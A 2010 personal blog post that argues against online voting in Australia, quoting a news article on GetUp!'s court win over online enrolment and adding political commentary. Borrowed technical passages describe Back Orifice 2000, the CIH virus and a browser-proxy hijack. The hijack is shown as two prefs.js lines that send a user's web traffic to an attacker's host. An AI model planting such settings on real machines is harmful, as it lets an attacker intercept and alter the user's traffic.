Saturday, August 14, 2010

Emergency Broadcast.

When reading this blog, in order to best understand the angle I'm taking, assume that I don't support the corrupt system of Government in Australia, and don't trust anything they say/do as being anything other than a ramp leading to the self-interest of a select few with vast amounts of wealth.

This doesn't mean I don't like to party! I just know this setup is broken, and it's well within our means to fix it, so that it works for everyone, and it won't make us Communists.

This article is of great concern to me.

It really shouldn't matter, as it doesn't matter who you vote for, you still end up with 'The Government'. But if you're going to waste your time buying into a system where you vote for whatever you consider to be the lesser of 2 evils, when in reality, they're all owned/funded/dictated to by the same people (banks, mainly), then that vote should still be counted in a legal and ethical way.

'Get Up' is a not for profit organisation in Australia, that is funded by donation, and does some exceedingly great work in attempting to "
build an accountable and progressive Parliament - a Parliament with economic fairness, social justice and environment at its core."

I respect the organisation, and what they do. But I also know, as Aldous Huxley explained:

"
Hell isn't merely paved with good intentions; it's walled and roofed with them. Yes, and furnished too."

I'll paste the article here, my comments will be in bold...

GetUp! wins again in online vote case

Jessica Mahar
August 13, 2010 - 3:34PM

Australians will be able to enrol online after the Federal Court ruled in favour of activist group GetUp! in their action against the Australian Electoral Commission.

The group took the commission to court after concern was expressed about an online voting enrolment site it created in July.

(More on that here.)

But today Federal Court Justice Nye Perram ruled the test case of 19-year-old Sophie Trevitt, who enrolled on the GetUp! website OzEnrol, was legal.

GetUp! national director Simon Sheikh called the win "historic".

‘‘Today’s decision vindicates the process of online enrolment,’’ Mr Sheikh told reporters.

Just because the Federal Court Justice makes something legal, doesn't mean it's actually the right thing to do, or that it will work.

‘‘We know that we pay our taxes online, that we do our banking online and we should be able to enrol to vote online.’’

The fundamental difference being, that when you pay taxes, that money is going to one source. If 2 competing sources were vying for that tax payment, then problems would immediately arise.

When you bank online, you bank between yourself, and your bank (who act as an intermediary (and are paid accordingly), who then in turn act as an intermediary between themselves and the creditor. If more than one agent acted as 'the bank' in that equation, your money may not make it to where you wish to pay it.

He said GetUp would be campaigning to allow online enrolments in all future elections, starting with Victoria’s state election in November.

‘‘The AEC’s next moves are up to them. We’ll be pushing the case for online voting vigorously so that it can be in place in time for the Victorian state election.’’

End.

So- in simple terms, here is the problem:

While online voting would be more convenient, there is no guarantee that your vote will be counted as cast. Without a physical ballot (like the traditional paper ballot), there is no way of checking the results against actual votes.

It has been demonstrated that it is possible to tamper with software of a voting machine to add malicious code and alter vote totals or favor any candidate. A demonstration how this could be done on a Premier Elections Solutions (formerly Diebold Election Systems) AccuVote-TS was conducted by the Center forInformation Technology Policy, at Princeton University. Another demonstration with a different voting system was shown on Dutch TV by the group "Wij vertrouwen stemcomputers niet".

And if there is no voting machine, just direct internet connection between voters and the Australian Electoral Commission, then the Government has been handed direct control of your voting results. They decide who stays, and who goes, not you. Without paper ballots to count, they can manipulate the voting data, and there is no way to prove they did.

Also, there exist Malicious Payloads (Backorifice 2000/CIH virus), that can actually change the voter's vote, without the voter or anyone else noticing, regardless of the kind of encryption or voter authentication in place. This is because the malicious code can do its damage before the encryption and authentication is applied to the data. The malicious module can then erase itself after doing its damage so that there is no evidence to correct, or even detect the fraud.

The delivery mechanisms for these attack viruses can be physical or remote installation (email virus), social engineering (where people are fooled into giving up their own security), or specialized devices that are open to tampering.

The first program, Backorifice 2000 (BO2K) is packaged and distributed as a legitimate network administration toolkit. In fact, it is very useful as a tool for enhancing security. It is freely available, fully open source, extensible, and stealth (defined below). The package is available here. BO2K contains a remote control server that when installed on a machine, enables a remote administrator (or attacker) to view and control every aspect of that machine, as though the person were actually sitting at the console. This is similar in functionality to a commercial product called PCAnywhere. The main differences are that BO2K is available in full source code form and it runs in stealth mode.

The open source nature of BO2K means that an attacker can modify the code and recompile such that the program can evade detection by security defense software (virus and intrusion detection) that look for known signatures of programs. A signature is a pattern that identifies a particular known malicious program. The current state of the art in widely deployed systems for detecting malicious code does not go much beyond comparing a program against a list of attack signatures. In fact, most personal computers in peoples’ houses have no detection software on them. BO2K is said to run in stealth mode because it was carefully designed to be very difficult to detect. The program does not appear in the Task Menu of running processes, and it was designed so that even an experienced administrator would have a difficult time discovering that it was on a computer. The program is difficult to detect even while it is running.

There can be no expectation that an average Internet user participating in an online election from home could have any hope of detecting the existence of BO2K on his computer. At the same time, this program enables an attacker to watch every aspect of the voting procedure, intercept any action of the user with the potential of modifying it without the user’s knowledge, and to further install any other program of the attackers desire, even ones written by the attacker, on the voting user’s machine. The package also monitors every keystroke typed on the machine and has an option to remotely lock the keyboard and mouse. It is difficult, and most likely impossible, to conceive of a web application (or any other) that could prevent an attacker who installs BO2K on a user’s machine from being able to view and/or change a user’s vote.

The second malicious payload , the CIH virus, is also known as the Chernobyl virus. There are two reasons why I chose this example over the many other possible ones. The first is that the malicious functionality of this virus is triggered to activate on a particular day. April 26, 1999 was a disastrous day in Asia, where the virus had not been that well known, and thousands of computers were affected. This raises concern because election dates are known far in advance. The second reason for choosing this example is that the damage that it caused was so severe, that it often required physically taking the computer to the shop for repair. The code modified the BIOS of the system in such a way that it could not boot. The BIOS is the part of the computer that initializes and manages the relationships and data flow between the system devices, including the hard drive, serial and parallel ports, and the keyboard. A widespread activation of such a virus on the day of an election, or on a day leading up to an election could potentially disenfranchise many voters, as their hosts would not be usable. This threat is increased by the possibility that the spread of the virus could be orchestrated to target a particular demographic group, thus having a direct effect on the election, and bringing the integrity of the entire process into question.

It does not take a very sophisticated malicious payload to disrupt an election. A simple attack illustrates how easy it is to thwart a web application such as voting. Netscape and Internet Explorer have an option setting that indicates that all web communication should take place via a proxy. A proxy is a program that is interposed between the client and the server. It has the ability to completely control all Internet traffic between the two. Proxies are useful for many Internet applications and for sites that run certain kinds of firewalls. The user sets a proxy by making a change in the preferences menu. The browser then adds a couple of lines to a configuration file. For example, in Netscape, the existence of the following lines in the file

c:\program_files\netscape\prefs.js

delivers all web content to and from the user’s machine to a program listening on port 1799 on the machine www.hellbournechoppers.com.

user_pref("network.proxy.http", "www.hellbournechoppers.com");

user_pref("network.proxy.http_port", 1799);

If an attacker can add these two lines (substituting his hostname for www.hellbournechoppers.com) to the preferences file on somebody’s machine, he can control every aspect of the web experience of that user. There are also ways of doing this without leaving a trail that leads directly to the attacker. While proxies cannot be used to read information in a secure connection, they can be used to fool a user into a secure connection with the attacker, instead of the actual voting server, without the user realizing it.

With this in mind, it's not just the Government fudging results you should be concerned about, it's direct access by unscrupulous operators (big business!), taking direct control of your votes with no evidence that they have done so.

To be honest, right now, with the system set up as it is, your votes count for nothing. But if we manage to regain control of our Government through the creation and succession of a new political party that actually represents us instead of bankers, then a solid voting system would be hella advantageous.

Another factor to consider, is, even if the internet was a safe way to vote (which it isn't), votes are not guaranteed legitimate, for the following reasons:

1. Vote buying.

Say you're a disillusioned voter, and you can't be bothered. And say you were offered $100 for your vote. Would you sell it? Some would, and if internet voting comes into play, some will.

2. Vote bullying.

Say you owe someone money, and they say they will forgive your debt if you vote for their candidate. Or say you are flat-out intimidated into doing so. This happens all over the world, and where power is concerned, it can happen here.

3. Vote coercion.

Say you have a controlling family member/partner, and they strongly wish for you to vote their way. Would you? Some would, and again. some will. Without one person in a booth at a time, this will happen.

So as you can see, the issue isn't as black and white as 'Internet voting is convenient!'...it's actually a convenient way of giving up control of one of the few rights you have left in the so-called age of terror.

If you're concerned about this, please email Get Up here, and let them know why their great intention could be handing the keys to the wrong people.

info@getup.org.au

I will send Getup a link to this blog, and let you know if they respond.

(Monday 16th August, 2010... I did send them a link, and also posted an encouraging comment directing people with a thirst for more info to this page. My comment didn't make it past moderation, and my email has not been replied to. So maybe it's time I re-thought my position on how balanced Getup really is?)

More info:

http://www.msnbc.msn.com/id/3077251/

http://www.edubook.com/pros-and-cons-of-electronic-voting/22885/

http://cwilk00.tripod.com/cons.html


Addendum:

I deleted a comment submitted to this post today, and I'd like to explain why. It was sent from the 'Pro internet voting camp', was a form comment (sent to numerous sources in the same format), and wasn't even addressed to this blog (it was addressed to Getup Australia).

Normally I allow dissenting commentary on this blog, as more opinions gets us all closer to the facts, however this comment was simply propaganda, designed to lead us further into confusion (by avoiding facts).

Also, the same comment was posted to my formspring account, which isn't a forum or a site designed for comments- it is designed for questions. The reason the anonymous poster did this was to increase the number of links available to search engines...to confuse the matter, as opposed to casting light on it. This is a typical tactic, one that leads us away from a state of affairs where we can engage in meaningful debate based on facts.

Don't be fooled by what they say, or what I say for that matter! The purpose of me writing about issues is to encourage you to research them for yourselves, and arrive at educated conclusions as opposed to ignorant ones.

Vested interests invest heavily to keep you ignorant. Don't let them...


This is knifey, from 'the internet'.
































This blog has borrowed technical information from this source-

http://avirubin.com/e-voting.security.html


No comments: